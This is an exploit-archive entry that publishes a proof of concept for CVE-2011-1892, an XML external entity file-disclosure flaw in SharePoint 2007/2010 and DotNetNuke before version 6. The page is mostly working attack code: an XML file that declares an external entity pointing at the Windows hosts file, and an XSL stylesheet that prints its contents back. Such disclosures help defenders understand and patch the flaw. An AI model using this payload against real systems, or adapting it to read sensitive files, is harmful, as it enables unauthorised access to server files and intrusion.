[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : File disclosure via XEE in SharePoint 2007/2010 and DotNetNuke < 6
# Published : 2011-09-20
# Author :
# Previous Title : WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability
# Next Title : Wordpress Mailing List Plugin 1.3.2 Remote File Inclusion
Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE : CVE-2011-1892
poc filename: xee.xml
<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\windows\system32\drivers\etc\hosts">
]>
<doc>&boom;</doc>
poc filename: xee.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:apply-templates/>
<xsl:value-of select="doc"/>
</xsl:template>
</xsl:stylesheet>